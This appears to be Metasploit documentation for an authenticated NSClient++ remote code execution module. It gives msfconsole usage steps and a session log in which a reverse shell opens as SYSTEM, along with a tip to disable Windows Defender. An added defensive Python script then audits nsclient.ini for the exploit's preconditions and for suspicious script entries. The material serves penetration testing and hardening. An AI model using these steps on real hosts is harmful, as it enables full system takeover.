documentation/modules/exploit/windows/http/nscp_authenticated_rce.md
This module allows an attacker who knows the admin password of NSClient++ 0.5.2.35 to start a privileged reverse shell.
For this module to work, both the web interface of NSClient++ and the ExternalScripts feature must be enabled.
A vulnerable version of NSClient++ can be downloaded from [here](https://nsclient.org/download/). You can then follow
this installation guide to complete the installation. Don't forget to enable the web interface
and the ExternalScripts feature, otherwise the exploit will not work.
Steps needed to verify that the module works:

1. Start `msfconsole`
2. `use exploit/windows/http/nscp_authenticated_rce`
3. `set RHOST <target_host>`
4. `set PASSWORD <admin_password>` to set the admin password of the NSClient++ web interface
5. `check` to check whether the targeted NSClient++ is vulnerable
6. `set payload <choose_a_payload>` to set a specific payload to send
7. `run` the module to exploit the vulnerability and start a shell

Options: `PASSWORD` sets the password of the admin account of NSClient++.
This module was successfully tested on Windows 10 Home (you may need to disable Windows Defender, as the msf payload could be flagged). See the following output:
```
msf > use nscp_authenticated_rce
[*] Using configured payload windows/x64/shell_reverse_tcp
msf exploit(nscp_authenticated_rce) > set RHOST x.x.x.x
RHOST => x.x.x.x
msf exploit(nscp_authenticated_rce) > set password easypassword
password => easypassword
msf exploit(nscp_authenticated_rce) > exploit
[*] Started reverse TCP handler on y.y.y.y:4444
[*] Executing automatic check (disable AutoCheck to override)
[+] Got auth token: frAQBc8Wsa1xVPfvJcrgRYwTiizs2trQ
[+] The target is vulnerable. External scripts feature enabled !
[*] Configuring Script with Specified Payload . . .
[*] Added External Script (name: zqlmwevxef)
[*] Saving Configuration . . .
[*] Reloading Application . . .
[*] Waiting for Application to reload . . .
[*] Triggering payload, should execute shortly . . .
[*] Command shell session 21750 opened (y.y.y.y:4444 -> x.x.x.x:51026) at 2021-06-08 16:54:39 +0200
C:\Program Files\NSClient++>whoami
whoami
nt authority\system
```
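The two preconditions named at the top of this page (web interface enabled, ExternalScripts enabled) and the trace the session leaves behind (a new external script with a generated name, followed by a config save and reload) are both things a defender can audit from `nsclient.ini`. The following script is an added example, not part of the Metasploit module or of NSClient++: it parses an ini file, reports whether both preconditions hold, and lists external script entries that are not on an operator allowlist, flagging ones whose name looks generated like the `zqlmwevxef` entry above. The section and key names (`[/modules]`, `WEBServer`, `CheckExternalScripts`, `[/settings/external scripts/scripts]`) are assumed NSClient++ defaults and do not appear on this page; the sample ini content is constructed.

```python
"""Audit an NSClient++ nsclient.ini for the exposure this module relies on.

Added example; not code from the Metasploit module or from NSClient++.
Section and key names are assumed NSClient++ defaults, not taken from this page.
"""
import configparser
import re

# Assumed layout: modules toggled under [/modules] as "<Module> = enabled",
# external scripts stored under [/settings/external scripts/scripts] as "name = command".
MODULES_SECTION = "/modules"
SCRIPTS_SECTION = "/settings/external scripts/scripts"
WEB_MODULE = "WEBServer"
EXT_SCRIPTS_MODULE = "CheckExternalScripts"

# Constructed sample modelled on the state the module needs, plus an entry named
# like the "Added External Script (name: zqlmwevxef)" line in the session above.
# The command value is a placeholder, not the module's real payload.
EXPOSED_INI = """
[/modules]
CheckExternalScripts = enabled
WEBServer = enabled
CheckSystem = enabled

[/settings/external scripts/scripts]
check_updates = scripts\\check_updates.bat
zqlmwevxef = <attacker-supplied command placeholder>
"""

# Same host with the ExternalScripts module switched off: one precondition is gone.
HARDENED_INI = EXPOSED_INI.replace("CheckExternalScripts = enabled",
                                   "CheckExternalScripts = disabled")


def parse_ini(text):
    """Parse nsclient.ini text, keeping key case and disabling % interpolation."""
    cp = configparser.ConfigParser(interpolation=None)
    cp.optionxform = str  # keep module and script names exactly as written
    cp.read_string(text)
    return cp


def module_enabled(cp, name):
    """True when [/modules] lists the module as 'enabled' (case-insensitive value)."""
    if not cp.has_section(MODULES_SECTION):
        return False
    return cp.get(MODULES_SECTION, name, fallback="").strip().lower() == "enabled"


def audit_exposure(cp):
    """Report the two preconditions the module needs and whether both hold."""
    web = module_enabled(cp, WEB_MODULE)
    ext = module_enabled(cp, EXT_SCRIPTS_MODULE)
    return {"web_enabled": web, "external_scripts_enabled": ext, "exposed": web and ext}


def random_looking(name):
    """Heuristic: the generated name in the session is ten bare lowercase letters;
    flag any name made of eight or more lowercase letters with no separator or digit."""
    return re.fullmatch(r"[a-z]{8,}", name) is not None


def unexpected_scripts(cp, allowlist):
    """External script entries not on the operator's allowlist, sorted by name."""
    if not cp.has_section(SCRIPTS_SECTION):
        return []
    return sorted(k for k in cp.options(SCRIPTS_SECTION) if k not in allowlist)


def report(text, allowlist):
    """Full audit: preconditions plus unexpected and generated-looking script names."""
    cp = parse_ini(text)
    result = audit_exposure(cp)
    result["unexpected_scripts"] = unexpected_scripts(cp, allowlist)
    result["random_named_scripts"] = [s for s in result["unexpected_scripts"]
                                      if random_looking(s)]
    return result


if __name__ == "__main__":
    for label, ini in (("exposed", EXPOSED_INI), ("hardened", HARDENED_INI)):
        print(label, report(ini, {"check_updates"}))
```

Run it against a real `nsclient.ini` by reading the file into `report()`; the allowlist should be the set of script names your monitoring actually relies on, so that anything else, generated-looking or not, surfaces for review. Disabling either module removes the precondition, which the hardened sample shows.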